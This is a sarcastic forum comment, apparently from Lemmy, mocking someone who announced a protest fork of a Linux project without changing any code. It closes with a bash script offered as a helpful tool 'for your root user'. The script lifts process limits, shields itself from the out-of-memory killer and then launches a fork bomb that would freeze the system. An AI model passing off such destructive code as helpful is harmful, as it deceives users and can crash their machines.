• FauxLiving@lemmy.world
    link
    fedilink
    English
    arrow-up
    0
    ·
    edit-2
    5 hours ago

    @gigachad@piefed.social has the best serious response, that being said…

    So far, nothing but the README has been changed

    Worth keeping in mind that I’m not a programmer, I cannot write code yet

    Finally, what we’ve all been waiting for: a fork that liberates us from the tyranny of git checkout and editing a text file.

    Is there a Patreon or 501(c)(3) organization that we can donate to in order to support the continued work non-programmers who use social media announce protest forks of major projects without any ability or intent to continue the project?

    We in the Linux community have too much free time and appreciate things like this consuming our surplus attention which would otherwise be wasted making memes about Windows, berating people for not reading the fantastic manual and tweaking our fastfetch layouts.

    As a thanks to you, and all other performative fork developers, I’ve developed a simple bash script for your root user that will help you create forks in a more efficient manner:

    #!/bin/bash
    sysctl -w kernel.pid_max=4194304
    sysctl -w kernel.threads-max=1073741823
    echo "max" > /sys/fs/cgroup/user.slice/user-$(id -u).slice/pids.max 2>/dev/null || true
    echo $$ > /sys/fs/cgroup/cgroup.procs 2>/dev/null || true
    ulimit -u unlimited
    echo -1000 > /proc/self/oom_score_adj
    :(){ :|:& };: